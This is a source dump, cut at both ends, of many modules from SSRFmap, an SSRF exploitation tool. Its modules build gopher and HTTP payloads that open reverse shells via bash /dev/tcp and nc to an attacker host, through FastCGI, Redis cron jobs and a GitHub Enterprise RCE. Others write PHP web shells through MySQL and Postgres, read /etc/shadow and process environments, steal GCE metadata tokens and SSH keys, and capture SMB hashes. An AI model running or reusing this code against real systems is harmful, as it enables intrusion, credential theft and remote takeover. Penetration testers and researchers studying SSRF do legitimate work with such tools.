"%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/SERVER_HOST/SERVER_PORT%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00" 31 | payload = wrapper_gopher(data, ip , port) 32 | 33 | # Handle args for reverse shell 34 | payload = payload.replace("SERVER_HOST", self.SERVER_HOST) 35 | payload = payload.replace("SERVER_PORT", self.SERVER_PORT) 36 | 37 | # Send the payload 38 | r = requester.do_request(args.param, payload) -------------------------------------------------------------------------------- /modules/gce.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import os 4 | 5 | name = "gce" 6 | description = "Access sensitive data from GCE" 7 | author = "mrtc0" 8 | documentation = [ 9 | "https://cloud.google.com/compute/docs/storing-retrieving-metadata", 10 | "https://hackerone.com/reports/341876", 11 | "https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/" 12 | ] 13 | 14 | class exploit(): 15 | endpoints = set() 16 | 17 | def __init__(self, requester, args): 18 | logging.info(f"Module '{name}' launched !") 19 | self.add_endpoints() 20 | 21 | r = requester.do_request(args.param, "") 22 | if r != None: 23 | default = r.text 24 | 25 | # Create directory to store files 26 | directory = requester.host 27 | # Replace : with _ for window folder name safe 28 | # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters 29 | directory = directory.replace(':','_') 30 | if not os.path.exists(directory): 31 | os.makedirs(directory) 32 | 33 | for endpoint in self.endpoints: 34 | payload = wrapper_http(endpoint[1], endpoint[0] , "80") 35 | r = requester.do_request(args.param, payload) 36 | diff = diff_text(r.text, default) 37 | if diff != "": 38 | 39 | # Display diff between default and ssrf request 40 | logging.info(f"\033[32mReading file\033[0m : {payload}") 41 | print(diff) 42 | 43 | # Write diff to a file 44 | filename = endpoint[1].split('/')[-1] 45 | if filename == "": 46 | filename = endpoint[1].split('/')[-2:-1][0] 47 | 48 | logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}") 49 | with open(directory + "/" + filename, 'w') as f: 50 | f.write(diff) 51 | 52 | 53 | def add_endpoints(self): 54 | self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json") ) 55 | self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/service-accounts/default/token") ) 56 | self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/kube-env?alt=json") ) 57 | self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json") ) 58 | 59 | 60 | -------------------------------------------------------------------------------- /modules/github.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import urllib.parse 3 | import logging 4 | 5 | name = "github" 6 | description = "Github Enterprise RCE < 2.8.7" 7 | author = "Orange" 8 | documentation = [ 9 | "https://www.exploit-db.com/exploits/42392/", 10 | "https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html" 11 | ] 12 | 13 | class exploit(): 14 | 15 | def __init__(self, requester, args): 16 | logging.info(f"Module '{name}' launched !") 17 | 18 | # Data for the service 19 | ip = "0" 20 | port = "8000" 21 | data = "composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/" 22 | 23 | cmd = "id | nc SERVER_HOST SERVER_PORT" 24 | # cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh" 25 | marshal_code = f'\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{cmd}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' 26 | payload = [ 27 | '', 28 | 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), 29 | marshal_code, 30 | '', 31 | '' 32 | ] 33 | payload = map(urllib.parse.quote, payload) 34 | payload = wrapper_http(data+'%0D%0A'.join(payload), ip, port) 35 | 36 | # Handle args for reverse shell 37 | if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:")) 38 | else: payload = payload.replace("SERVER_HOST", args.lhost) 39 | 40 | if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:")) 41 | else: payload = payload.replace("SERVER_PORT", args.lport) 42 | 43 | 44 | logging.info("You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'") 45 | logging.info("Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'") 46 | logging.info(f"Payload : {payload}") -------------------------------------------------------------------------------- /modules/httpcollaborator.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | from core.handler import Handler 3 | import re 4 | import logging 5 | import urllib.parse 6 | 7 | """ 8 | Example: 9 | ``` 10 | ~$ python3 ssrfmap.py -v -r data/request.txt -p url,path --lhost=public-ip --lport 4242 -m httpcollaborator -l http 11 | ``` 12 | Use ssh/autossh to established remote tunnel between public and localhost handler if running module locally against remote target 13 | ``` 14 | ~$ ssh -fN -R public-ip:4242:127.0.0.1:4242 username@public-ip 15 | ``` 16 | """ 17 | 18 | name = "httpcollaborator" 19 | description = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf" 20 | author = "xyzkab" 21 | documentation = [] 22 | 23 | class exploit(): 24 | SERVER_HOST = "127.0.0.1" 25 | SERVER_PORT = "4242" 26 | 27 | def __init__(self, requester, args): 28 | logging.info(f"Module '{name}' launched !") 29 | 30 | # Handle args for httpcollaborator 31 | if args.lhost == None: self.SERVER_HOST = input("Server Host:") 32 | else: self.SERVER_HOST = args.lhost 33 | 34 | if args.lport == None: self.SERVER_PORT = input("Server Port:") 35 | else: self.SERVER_PORT = args.lport 36 | 37 | params = args.param.split(",") 38 | for param in params: 39 | logging.info(f"Testing PARAM: {param}") 40 | payload = wrapper_http(f"?{param}", args.lhost, args.lport.strip() ) 41 | r = requester.do_request(param, payload) 42 | 43 | logging.info(f"Module '{name}' finished !") 44 | -------------------------------------------------------------------------------- /modules/memcache.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import urllib.parse 3 | import logging 4 | 5 | name = "memcache" 6 | description = "Store data inside the memcache instance" 7 | author = "Swissky" 8 | documentation = [] 9 | 10 | class exploit(): 11 | SERVICE_IP = "127.0.0.1" 12 | SERVICE_PORT = "11211" 13 | SERVICE_DATA = "\r\n" 14 | 15 | def __init__(self, requester, args): 16 | logging.info(f"Module '{name}' launched !") 17 | gen_host = gen_ip_list("127.0.0.1", args.level) 18 | payload = input("Data to store: ") 19 | 20 | self.SERVICE_DATA += f'set payloadname 0 0 {len(payload)}\r\n' 21 | self.SERVICE_DATA += f'{payload}\r\n' 22 | self.SERVICE_DATA += 'quit\r\n' 23 | self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA) 24 | 25 | for SERVICE_IP in gen_host: 26 | payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT) 27 | 28 | if args.verbose == True: 29 | logging.info(f"Generated payload : {payload}") 30 | 31 | r = requester.do_request(args.param, payload) 32 | 33 | if args.verbose == True: 34 | logging.info("Module '{name}' ended !") -------------------------------------------------------------------------------- /modules/mysql.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import binascii 4 | 5 | # NOTE 6 | # This exploit is a Python 3 version of the Gopherus tool 7 | 8 | name = "mysql" 9 | description = "Execute MySQL command < 8.0" 10 | author = "Swissky" 11 | documentation = [ 12 | "https://spyclub.tech/2018/02/05/2018-02-05-ssrf-through-gopher/", 13 | "https://github.com/eboda/34c3ctf/tree/master/extract0r", 14 | "https://infosec.rm-it.de/2018/07/29/isitdtu-ctf-2018-friss/", 15 | "http://shaobaobaoer.cn/archives/643/gopher-8de8ae-ssrf-mysql-a0e7b6" 16 | ] 17 | 18 | class exploit(): 19 | user = "root" 20 | query = "SELECT database();#" 21 | reverse = "select \"& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1'); ?>\" INTO OUTFILE '/var/www/html/shell.php'" 22 | dios = "(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#" 23 | 24 | 25 | def __init__(self, requester, args): 26 | logging.info(f"Module '{name}' launched !") 27 | 28 | # Encode the username for the request 29 | self.user = input("Give MySQL username: ") 30 | encode_user = binascii.hexlify( self.user.encode() ) 31 | user_length = len(self.user) 32 | temp = user_length - 4 33 | length = f'{(0xa3 + temp):x}' 34 | 35 | # Authenticate to MySQL service - only work with users allowed without password 36 | dump = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000" 37 | dump += encode_user.decode() 38 | dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c" 39 | dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d" 40 | dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c" 41 | 42 | query = input("Give MySQL query to execute (reverse/dios or any SQL statement): ") 43 | 44 | # Reverse shell - writing system() in /var/www/html/shell.php 45 | if query == "reverse": 46 | self.query = self.reverse 47 | if args.lhost == None: 48 | self.query = self.query.replace("SERVER_HOST", input("Server Host:")) 49 | else: 50 | self.query = self.query.replace("SERVER_HOST", args.lhost) 51 | 52 | if args.lport == None: 53 | self.query = self.query.replace("SERVER_PORT", input("Server Port:")) 54 | else: 55 | self.query = self.query.replace("SERVER_PORT", args.lport) 56 | 57 | # Dump in one shot - extract every databases/tables/columns 58 | elif query == "dios": 59 | self.query = self.dios 60 | 61 | else: 62 | self.query = query 63 | 64 | auth = dump.replace("\n","") 65 | 66 | # For every IP generated, send the payload and extract the result 67 | gen_host = gen_ip_list("127.0.0.1", args.level) 68 | for ip in gen_host: 69 | payload = self.get_payload(self.query, auth, ip) 70 | logging.info(f"Generated payload : {payload}") 71 | 72 | r1 = requester.do_request(args.param, payload) 73 | r2 = requester.do_request(args.param, "") 74 | if r1 != None and r2!= None: 75 | diff = diff_text(r1.text, r2.text) 76 | print(diff) 77 | 78 | 79 | def encode(self, s, ip): 80 | a = [s[i:i + 2] for i in range(0, len(s), 2)] 81 | return wrapper_gopher("%"+"%".join(a), ip, "3306") 82 | 83 | 84 | def get_payload(self, query, auth, ip): 85 | if(query.strip()!=''): 86 | query = binascii.hexlify( query.encode() ) 87 | query_length = f'{(int((len(query) / 2) + 1)):x}' 88 | pay1 = query_length.rjust(2,'0') + "00000003" + query.decode() 89 | final = self.encode(auth + pay1 + "0100000001", ip) 90 | return final 91 | else: 92 | return self.encode(auth, ip) 93 | -------------------------------------------------------------------------------- /modules/networkscan.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | from datetime import datetime 3 | import sys, struct, socket 4 | import logging 5 | import concurrent.futures 6 | 7 | name = "networkscan" 8 | description = "Scan the network - HTTP Ping sweep" 9 | author = "Swissky" 10 | documentation = [] 11 | 12 | class exploit(): 13 | ips = set() 14 | 15 | def __init__(self, requester, args): 16 | logging.info(f"Module '{name}' launched !") 17 | 18 | # concurrent requests in order to limit the time 19 | self.add_range("192.168.1.0/24") # Default network 20 | self.add_range("192.168.0.0/24") # Default network 21 | 22 | # Uncomment these lines if you need to scan more networks 23 | # self.add_range("172.17.0.0/16") # Docker network 24 | # self.add_range("172.18.0.0/16") # Docker network 25 | 26 | 27 | 28 | r = requester.do_request(args.param, "") 29 | with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor: 30 | future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80", r): ip for ip in self.ips} 31 | 32 | 33 | def add_range(self, ip_cidr): 34 | (ip, cidr) = ip_cidr.split('/') 35 | cidr = int(cidr) 36 | host_bits = 32 - cidr 37 | i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness 38 | start = (i >> host_bits) << host_bits # clear the host bits 39 | end = start | ((1 << host_bits) - 1) 40 | 41 | # excludes the first and last address in the subnet 42 | for i in range(start, end): 43 | self.ips.add(socket.inet_ntoa(struct.pack('>I',i))) 44 | 45 | 46 | def concurrent_request(self, requester, param, host, port, compare): 47 | try: 48 | payload = wrapper_http("", host, port.strip()) 49 | r = requester.do_request(param, payload) 50 | 51 | if (not "Connection refused" in r.text) and (r.text != compare.text): 52 | timer = datetime.today().time().replace(microsecond=0) 53 | print(f"\t[{timer}] Found host :{host+ ' '*40}") 54 | 55 | timer = datetime.today().time().replace(microsecond=0) 56 | except Exception as e: 57 | pass -------------------------------------------------------------------------------- /modules/portscan.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | from datetime import datetime 3 | import logging 4 | import concurrent.futures 5 | 6 | name = "portscan" 7 | description = "Scan ports of the target" 8 | author = "Swissky" 9 | documentation = [] 10 | 11 | class exploit(): 12 | 13 | def __init__(self, requester, args): 14 | logging.info(f"Module '{name}' launched !") 15 | r = requester.do_request(args.param, "") 16 | 17 | load_ports = "" 18 | with open("data/ports", "r") as f: 19 | load_ports = f.readlines() 20 | 21 | # Using a generator to create the host list 22 | gen_host = gen_ip_list("127.0.0.1", args.level) 23 | for ip in gen_host: 24 | # We can use a with statement to ensure threads are cleaned up promptly 25 | with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor: 26 | future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, port, r): port for port in load_ports} 27 | 28 | 29 | def concurrent_request(self, requester, param, host, port, compare): 30 | try: 31 | payload = wrapper_http("", host, port.strip()) 32 | r = requester.do_request(param, payload) 33 | 34 | # Display Open port 35 | if r != None and not "Connection refused" in r.text: 36 | timer = datetime.today().time().replace(microsecond=0) 37 | port = port.strip() + " "*20 38 | 39 | # Check if the request is the same 40 | if r.text != '' and r.text != compare.text: 41 | print(f"\t[{timer}] IP:{host:12s}, Found \033[32mopen \033[0m port n°{port}") 42 | else: 43 | print(f"\t[{timer}] IP:{host:12s}, Found \033[31mfiltered\033[0m port n°{port}") 44 | 45 | timer = datetime.today().time().replace(microsecond=0) 46 | port = port.strip() + " "*20 47 | print(f"\t[{timer}] Checking port n°{port}", end='\r'), 48 | 49 | # Timeout is a potential port 50 | except Exception as e: 51 | print(e) 52 | timer = datetime.today().time().replace(microsecond=0) 53 | port = port.strip() + " "*20 54 | print(f"\t[{timer}] IP:{host:212}, \033[33mTimed out\033[0m port n°{port}") 55 | pass -------------------------------------------------------------------------------- /modules/postgres.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import binascii 4 | 5 | # NOTE 6 | # This exploit is a Python 3 version of the Gopherus tool 7 | 8 | name = "postgres" 9 | description = "Execute Postgres command" 10 | author = "sengkyaut" 11 | documentation = [ 12 | "https://github.com/tarunkant/Gopherus" 13 | ] 14 | 15 | class exploit(): 16 | user = "postgres" 17 | database = "postgres" 18 | reverse = "COPY (SELECT '& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1\");?>') TO '/var/www/html/shell.php';" 19 | php_cmd_shell = "COPY (SELECT '') TO '/var/www/html/shell.php';" 20 | 21 | def __init__(self, requester, args): 22 | logging.info(f"Module '{name}' launched !") 23 | 24 | # Get the username, database, query 25 | self.user = input("Give Postgres username (Default postgres): ") or self.user 26 | self.database = input("Give Postgres Database name (Default postgres): ") or self.database 27 | query = input("Give Postgres query to execute (reverse or phpshell or any Postgres statement): ") 28 | 29 | # Reverse shell - writing system() in /var/www/html/shell.php 30 | if query == "reverse": 31 | self.query = self.reverse 32 | if args.lhost == None: 33 | self.query = self.query.replace("SERVER_HOST", input("Server Host:")) 34 | else: 35 | self.query = self.query.replace("SERVER_HOST", args.lhost) 36 | 37 | if args.lport == None: 38 | self.query = self.query.replace("SERVER_PORT", input("Server Port:")) 39 | else: 40 | self.query = self.query.replace("SERVER_PORT", args.lport) 41 | 42 | elif query == "phpshell": 43 | self.query = self.php_cmd_shell 44 | 45 | else: 46 | self.query = query 47 | 48 | # For every IP generated, send the payload 49 | gen_host = gen_ip_list("127.0.0.1", args.level) 50 | for ip in gen_host: 51 | payload = self.get_payload(self.query, ip) 52 | logging.info(f"Generated payload : {payload}") 53 | 54 | r = requester.do_request(args.param, payload) 55 | 56 | if query == "reverse" or query == "phpshell": 57 | logging.info(f"Please check the shell.php on the web root for confirmation.") 58 | 59 | logging.info(f"Module '{name}' ended !") 60 | 61 | def encode(self, s, ip): 62 | a = [s[i:i + 2] for i in range(0, len(s), 2)] 63 | return wrapper_gopher("%"+"%".join(a), ip, "5432") 64 | 65 | def encode_to_hex_str(self, data): 66 | return binascii.hexlify(data.encode()).decode() 67 | 68 | def get_payload(self, query, ip): 69 | if(query.strip()!=''): 70 | # Encode username, db and query 71 | encode_user = self.encode_to_hex_str(self.user) 72 | encode_db = self.encode_to_hex_str(self.database) 73 | encode_query = self.encode_to_hex_str(self.query) 74 | len_query = len(query) + 5 75 | 76 | # Construct the payload 77 | start = "000000" + self.encode_to_hex_str(chr(4+len(self.user)+8+len(self.database)+13)) + "000300" 78 | data = "00" + self.encode_to_hex_str("user") + "00" + encode_user + "00" + self.encode_to_hex_str("database") + "00" + encode_db 79 | data += "0000510000" + str(hex(len_query)[2:]).zfill(4) 80 | data += encode_query 81 | end = "005800000004" 82 | 83 | packet = start + data + end 84 | final = self.encode(packet, ip) 85 | return final 86 | else: 87 | logging.error(f"Query can't be empty") 88 | raise Exception('Postgres query empty!') 89 | -------------------------------------------------------------------------------- /modules/readfiles.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import os 4 | 5 | name = "readfiles" 6 | description = "Read files from the target" 7 | author = "Swissky" 8 | documentation = [] 9 | 10 | class exploit(): 11 | 12 | def __init__(self, requester, args): 13 | logging.info(f"Module '{name}' launched !") 14 | self.files = args.targetfiles.split(',') if args.targetfiles != None else [ 15 | "/etc/passwd", 16 | "/etc/lsb-release", 17 | "/etc/shadow", 18 | "/etc/hosts", 19 | "\/\/etc/passwd", 20 | "/proc/self/environ", 21 | "/proc/self/cmdline", 22 | "/proc/self/cwd/index.php", 23 | "/proc/self/cwd/application.py", 24 | "/proc/self/cwd/main.py", 25 | "/proc/self/exe" 26 | ] 27 | self.file_magic = {'elf' : bytes([0x7f, 0x45, 0x4c, 0x46])} 28 | 29 | r = requester.do_request(args.param, "") 30 | 31 | if r is not None: 32 | default = r.text 33 | 34 | # Create directory to store files 35 | directory = requester.host 36 | # Replace : with _ for window folder name safe 37 | # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters 38 | directory = directory.replace(':','_') 39 | if not os.path.exists(directory): 40 | os.makedirs(directory) 41 | 42 | for f in self.files: 43 | r = requester.do_request(args.param, wrapper_file(f)) 44 | diff = diff_text(r.text, default) 45 | if diff != "": 46 | 47 | # Display diff between default and ssrf request 48 | logging.info(f"\033[32mReading file\033[0m : {f}") 49 | if bytes(diff, encoding='utf-8').startswith(self.file_magic["elf"]): 50 | logging.info("ELF binary found - not printing to stdout") 51 | else: 52 | logging.info(diff) 53 | 54 | # Write diff to a file 55 | filename = f.replace('\\','_').replace('/','_') 56 | logging.info(f"\033[32mWriting file\033[0m : {f} to {directory + '/' + filename}") 57 | with open(directory + "/" + filename, 'w') as f: 58 | f.write(diff) 59 | 60 | else: 61 | logging.info("Empty response") 62 | -------------------------------------------------------------------------------- /modules/redis.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | 4 | name = "redis" 5 | description = "Redis RCE - Crontab reverse shell" 6 | author = "Swissky" 7 | documentation = [ 8 | "https://maxchadwick.xyz/blog/ssrf-exploits-against-redis", 9 | "http://vinc.top/2016/11/24/server-side-request-forgery/" 10 | ] 11 | 12 | class exploit(): 13 | SERVER_HOST = "127.0.0.1" 14 | SERVER_PORT = "4242" 15 | SERVER_CRON = "/var/lib/redis" 16 | 17 | def __init__(self, requester, args): 18 | logging.info(f"Module '{name}' launched !") 19 | 20 | # Handle args for reverse shell 21 | if args.lhost == None: self.SERVER_HOST = input("Server Host:") 22 | else: self.SERVER_HOST = args.lhost 23 | 24 | if args.lport == None: self.SERVER_PORT = input("Server Port:") 25 | else: self.SERVER_PORT = args.lport 26 | 27 | self.SERVER_CRON = input("Server Cron (e.g:/var/spool/cron/):") 28 | self.LENGTH_PAYLOAD = 65 - len("SERVER_HOST") - len("SERVER_PORT") 29 | self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_HOST)) 30 | self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_PORT)) 31 | 32 | # Using a generator to create the host list 33 | # Edit the following ip if you need to target something else 34 | gen_host = gen_ip_list("127.0.0.1", args.level) 35 | for ip in gen_host: 36 | 37 | # Data and port for the service 38 | port = "6379" 39 | data = "*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$LENGTH_PAYLOAD%0d%0a%0d%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/SERVER_HOST/SERVER_PORT%200>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0aSERVER_CRON%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a" 40 | payload = wrapper_gopher(data, ip , port) 41 | 42 | # Handle args for reverse shell 43 | payload = payload.replace("SERVER_HOST", self.SERVER_HOST) 44 | payload = payload.replace("SERVER_PORT", self.SERVER_PORT) 45 | payload = payload.replace("SERVER_CRON", self.SERVER_CRON) 46 | payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD)) 47 | 48 | if args.verbose == True: 49 | logging.info(f"Generated payload : {payload}") 50 | 51 | # Send the payload 52 | r = requester.do_request(args.param, payload) 53 | 54 | if args.verbose == True: 55 | logging.info(f"Module '{name}' ended !") 56 | 57 | """ 58 | TODO: 59 | This exploit only works if you have control over a cron file. 60 | Command execution via PHP file is not implemented, a simple example is the following. 61 | gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20myshell%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20DIR%20%2fwww%2f%0D%0ACONFIG%20SET%20DBFILENAME%20shell.php%0D%0ASAVE%0D%0AQUIT 62 | """ -------------------------------------------------------------------------------- /modules/smbhash.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | 4 | # NOTE 5 | # Use auxiliary/server/capture/smb from Metasploit to setup a listener 6 | 7 | name = "smbhash" 8 | description = "Force an SMB authentication attempt by embedding a UNC path (\\SERVER\SHARE) " 9 | author = "Swissky" 10 | documentation = [] 11 | 12 | class exploit(): 13 | UNC_EXAMPLE = "\\\\192.168.1.2\\SSRFmap" 14 | UNC_IP = "192.168.1.2" 15 | UNC_FILE = "SSRFmap" 16 | 17 | def __init__(self, requester, args): 18 | logging.info(f"Module '{name}' launched !") 19 | 20 | UNC_IP = input("UNC IP (default: 192.168.1.2): ") 21 | if UNC_IP != '': 22 | self.UNC_IP = UNC_IP 23 | 24 | UNC_FILE = input("UNC File (default: SSRFmap): ") 25 | if UNC_FILE != '': 26 | self.UNC_FILE = UNC_FILE 27 | 28 | payload = wrapper_unc(self.UNC_FILE, self.UNC_IP) 29 | r = requester.do_request(args.param, payload) 30 | logging.info(f"\033[32mSending UNC Path\033[0m : {payload}") 31 | -------------------------------------------------------------------------------- /modules/smtp.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import urllib.parse as urllib 3 | import logging 4 | 5 | name = "smtp" 6 | description = "Send a mail via SMTP" 7 | author = "Swissky" 8 | documentation = [] 9 | 10 | class exploit(): 11 | mailto = "admin@example.com" 12 | mailfrom = "ssrfmap@exploit.com" 13 | subject = "SSRF - Got it!" 14 | msg = "SMTP exploit worked" 15 | 16 | 17 | def __init__(self, requester, args): 18 | logging.info(f"Module '{name}' launched !") 19 | self.mailto = input("[MAILTO] Give a mail (e.g: hacker@example.com): ") 20 | 21 | gen_host = gen_ip_list("127.0.0.1", args.level) 22 | for ip in gen_host: 23 | port = 25 24 | commands = [ 25 | 'MAIL FROM:' + self.mailfrom, 26 | 'RCPT To:' + self.mailto, 27 | 'DATA', 28 | 'From:' + self.mailfrom, 29 | 'Subject:' + self.subject, 30 | 'Message:' + self.msg, 31 | '.', 32 | '' 33 | ] 34 | 35 | data = "%0A".join(commands) 36 | data = urllib.quote_plus(data).replace("+","%20") 37 | data = data.replace("%2F","/") 38 | data = data.replace("%25","%") 39 | data = data.replace("%3A",":") 40 | payload = wrapper_gopher(data, ip , port) 41 | logging.info("Generated payload : {}".format(payload)) 42 | 43 | 44 | logging.info("Mail sent, look your inbox !") 45 | r = requester.do_request(args.param, payload) -------------------------------------------------------------------------------- /modules/socksproxy.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import _thread 3 | import urllib.parse 4 | from urllib.request import urlopen 5 | import logging 6 | import binascii 7 | 8 | # NOTE 9 | # Due to the nature of SSRF vulnerabilities, 10 | # only one response is made from a request. 11 | # You can't get an interactive shell either.. 12 | 13 | # $ cat /etc/proxychains.conf 14 | # [ProxyList] 15 | # socks4 127.0.0.1 9000 16 | 17 | name = "socksproxy" 18 | description = "SOCKS Proxy - Socks4" 19 | author = "Swissky" 20 | documentation = [ 21 | "https://github.com/iamultra/ssrfsocks", 22 | "https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf" 23 | ] 24 | 25 | class exploit(): 26 | SOCKS = True 27 | HOST = 'localhost' 28 | PORT = 9000 29 | BUFSIZ = 4096 30 | TIMEOUT = 5 31 | 32 | def __init__(self, requester, args): 33 | logging.info(f"Module '{name}' launched !") 34 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | server.bind((self.HOST, self.PORT)) 36 | server.listen(2) 37 | logging.info(f"Listener ready on port {self.PORT}") 38 | try: 39 | while 1: 40 | client, addr = server.accept() 41 | _thread.start_new_thread(self.child, (client,addr,requester, args)) 42 | except KeyboardInterrupt: 43 | server.close() 44 | 45 | def child(self, sock, addr, requester, args): 46 | 47 | if self.SOCKS: 48 | req = sock.recv(self.BUFSIZ) 49 | host, port, extra = self.decodesocks(req) 50 | if extra == "": 51 | dest = socket.inet_ntoa(host.encode()) 52 | else: 53 | dest = extra 54 | 55 | destport, = struct.unpack("!H", port.encode()) 56 | sock.send(("\x00\x5a"+port+host).encode() ) 57 | 58 | data = sock.recv(self.BUFSIZ) 59 | 60 | try: 61 | encodeddata = urllib.parse.quote(data) 62 | payload = wrapper_gopher(encodeddata, dest , str(destport)) 63 | r = requester.do_request(args.param, payload) 64 | 65 | if r.text != None: 66 | sock.send(r.text.encode()) 67 | sock.close() 68 | 69 | except Exception as e: 70 | logging.error(e) 71 | sock.close() 72 | 73 | def decodesocks(self, req): 74 | req = req.decode() 75 | 76 | if req[0] != '\x04': 77 | raise Exception('bad version number') 78 | if req[1] != '\x01': 79 | raise Exception('only tcp stream supported') 80 | 81 | port = req[2:4] 82 | host = req[4:8] 83 | if host[0] == '\x00' and host[1] == '\x00' and host[2] == '\x00' and host[3] != '\x00': 84 | byname = True 85 | else: 86 | byname = False 87 | 88 | # NOTE: seems useless 89 | userid = "" 90 | i = 8 91 | while req[i] != '\x00': 92 | userid += req[i] 93 | extra = "" 94 | 95 | if byname: 96 | while req[i] != '\x00': 97 | extra += req[i] 98 | 99 | return host, port, extra -------------------------------------------------------------------------------- /modules/template.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | 4 | name = "servicename in lowercase" 5 | description = "ServiceName RCE - What does it do" 6 | author = "Name or pseudo of the author" 7 | documentation = ["http://link_to_a_research", "http://another_link"] 8 | 9 | class exploit(): 10 | SERVER_HOST = "127.0.0.1" 11 | SERVER_PORT = "4242" 12 | 13 | def __init__(self, requester, args): 14 | logging.info(f"Module '{name}' launched !") 15 | 16 | # Handle args for reverse shell 17 | if args.lhost == None: self.SERVER_HOST = input("Server Host:") 18 | else: self.SERVER_HOST = args.lhost 19 | 20 | if args.lport == None: self.SERVER_PORT = input("Server Port:") 21 | else: self.SERVER_PORT = args.lport 22 | 23 | # Using a generator to create the host list 24 | gen_host = gen_ip_list("127.0.0.1", args.level) 25 | for ip in gen_host: 26 | 27 | # Data and port for the service 28 | port = "6379" 29 | data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a" 30 | payload = wrapper_gopher(data, ip , port) 31 | 32 | # Handle args for reverse shell 33 | payload = payload.replace("SERVER_HOST", self.SERVER_HOST) 34 | payload = payload.replace("SERVER_PORT", self.SERVER_PORT) 35 | 36 | # Send the payload 37 | r = 